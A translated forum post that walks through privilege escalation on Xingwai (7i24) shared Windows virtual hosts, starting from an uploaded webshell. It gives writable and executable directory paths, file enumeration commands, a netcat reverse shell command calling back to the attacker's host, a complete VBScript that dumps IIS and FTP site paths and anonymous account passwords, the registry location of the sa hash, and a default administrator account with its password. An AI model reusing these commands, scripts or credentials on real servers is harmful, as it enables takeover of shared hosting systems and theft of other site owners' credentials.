Privilege escalation methods on Xingwai (星外) virtual hosts

Source: Internet
Author: User

A while ago I wrote about privilege escalation on Xingwai (星外) multi-site virtual hosts. Recently I ran into another one and combined my own approach with a few ideas from more experienced people. The target was a phishing site, which is annoying, and the application itself was solid, with no 0-day to use. A webshell was obtained; testing showed the host supports ASPX scripts, and after uploading an undetected (免杀) ASPX trojan the picture looked different. Still, the shell could not cross directories: the MySQL directory and others could not be reached, and CMD and the other privilege escalation tools either returned a blank result or a "no permission" prompt when uploaded. RegShell turned up little of use when reading the registry. From the information collected, this was a Xingwai host.

This is where newcomers easily get stuck.
Xingwai stores the sa password in the registry at HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 as a 32-character MD5 hash, and in many cases that MD5 cannot be cracked. An expert found a directory that is both writable and executable: C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\. Copy cmd.exe there and you can run simple commands such as set, systeminfo, ipconfig and ping, and use them to collect more information about the system.
If you are lucky and the host is misconfigured, dir still works on C:, D:, E: and the other drives. A long time ago little K (khjl1) sent me a for command; for needs lower permission than dir, so try it when dir is refused:

for /r d:\freehost\ %i in (*) do @echo %i >> C:\path\1.txt

This appends the full path of every file under d:\freehost\ to 1.txt (the single-percent %i form is for a command typed directly into cmd; inside a .bat file write %%i). From there, use VBS to read the IIS passwords. Many people mention an NC reverse shell, but in practice NC often cannot connect back because the firewall blocks it, so the success rate is low. If it fails and you still want to try NC, try it this way. The reverse shell entered as a single command line:

"C:\windows\temp\nc.exe" -vv ip 999 -e c:\windows\temp\cmd.exe

generally does not succeed (ip is the address of your own host, which must be listening on port 999, for example with nc -lvp 999). Instead enter c:\windows\temp\nc.exe in the webshell's cmd path field, and enter

-vv ip 999 -e c:\windows\temp\cmd.exe

in the command/argument field. That can succeed.
***** It did not succeed for me *****

Systeminfo showed that the administrator had applied the patches, so we try reading IIS with VBS instead. The VBS file itself does not need to go into the Media Index directory; it can stay in the web directory. What must be uploaded to Media Index first is the tool that runs it (cscript.exe), because only that directory allows execution. C:\Documents and Settings\ contains spaces, so the path must be wrapped in double quotes, for example:

Executable path:
C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cmd.exe
Arguments:
/C "C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe" d:\freehost\web\1.vbs

Without the quotes around the cscript.exe path the command fails with an error, so the details decide success or failure.

iis.vbs lists every domain name and its path, including our target site. Then use the TYPE command to read the target's configuration files (once you have escalated you can also read MSSQL or MySQL connection settings from web configs, which is useful for further escalation). In my case I only cared about the target; its database was Access. Combined with a few VBS scripts I keep on hand for reading IIS users and passwords, I got the password, connected on port 21, and the job was done.

People often ask me about an undetected LCX. In fact, if ASPX is supported, the ASPX shell has a PortMap function that many people overlook; it does the same port forwarding as LCX, so LCX is not needed where ASPX is supported. The above is a quick summary based on other people's experience and my own, written so that newcomers can learn from it. If anything is missing, please remind me.

Supplement (from www.2cto.com):

The Xingwai virtual host has always been regarded as BT (hardened to the point of being perverse). Actually I think it is still quite good: at least it supports ASPX, and once you find an executable directory you can take the server in seconds with 99% success.
In the latest version the executable directory is C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\, and there is also C:\PHP\PEAR. I have found C:\PHP\PEAR writable and executable on many virtual hosts, though fewer of them now. The Media Index directory has been mentioned many times on this forum, and the articles posted last night already explained it clearly.

The biggest Xingwai bug is that its FTP is the one that comes with Windows (IIS FTP), so the IIS configuration, including the FTP accounts, can be listed (upload cscript.exe and a modified adsutil.vbs).
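The script below is an added example written for this page; it is not the iis.vbs or the modified adsutil.vbs the author used. It does the same job those scripts are described as doing: it walks the IIS metabase through the ADSI provider (IIS://localhost/W3SVC for web sites and IIS://localhost/MSFTPSVC for FTP sites, the paths IIS 6 exposes) and prints each site's bindings, home directory and anonymous account name and password. The procedure name DumpService and the choice to dump both services are this example's own; the metabase property names (ServerComment, ServerBindings, Path, AnonymousUserName, AnonymousUserPass) are standard IIS 6 metabase properties.

```vbscript
Option Explicit
On Error Resume Next

' Print every site under one IIS service node.
'   svcPath   : ADSI path of the service, e.g. "IIS://localhost/W3SVC"
'   siteClass : ADSI class of a site under it, "IIsWebServer" or "IIsFtpServer"
Sub DumpService(svcPath, siteClass)
    Dim svc, site, root, b
    Set svc = GetObject(svcPath)
    If Err.Number <> 0 Then
        WScript.Echo "Cannot open " & svcPath & ": " & Err.Description
        Err.Clear
        Exit Sub
    End If
    For Each site In svc
        ' The service container also holds filter/info nodes; keep only sites.
        If LCase(site.Class) = LCase(siteClass) Then
            WScript.Echo site.Class & " " & site.Name & "  (" & site.ServerComment & ")"
            b = site.ServerBindings          ' array of "IP:port:hostheader" strings
            If IsArray(b) Then
                WScript.Echo "  Bindings : " & Join(b, " ; ")
            Else
                WScript.Echo "  Bindings : " & b
            End If
            ' The Root virtual directory carries the home path and the anonymous account.
            Set root = GetObject(svcPath & "/" & site.Name & "/Root")
            WScript.Echo "  Path     : " & root.Path
            WScript.Echo "  AnonUser : " & root.AnonymousUserName
            WScript.Echo "  AnonPass : " & root.AnonymousUserPass
            Err.Clear
        End If
    Next
End Sub

DumpService "IIS://localhost/W3SVC", "IIsWebServer"
DumpService "IIS://localhost/MSFTPSVC", "IIsFtpServer"
```

Run it with the cscript.exe that was copied into the Media Index directory, exactly as the /C invocation above does: cscript.exe //nologo iis.vbs. Whether AnonymousUserPass is returned depends on the metabase ACLs for the token the script runs under; an empty value means the property is not readable from that context, not that the account has no password.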

7i24 virtual host management platform, controlled end (被控端): user freehostrunat, password fa41328538d7be36e83ae91a78a1b16f!7
freehostrunat is created when Xingwai is installed and belongs to the Administrators group. Some people probably still do not understand what kind of encryption fa41328538d7be36e83ae91a78a1b16f!7 is. I used to be just as clueless: I went looking in the registry, the configuration files and so on, and never managed to decrypt it. Later I thought it through: its authentication cannot involve encryption, because the FTP that comes with Windows would not recognise ciphertext, and the other sites' credentials are in plaintext as well. So this string is the plaintext password itself, and you simply log in with it directly.
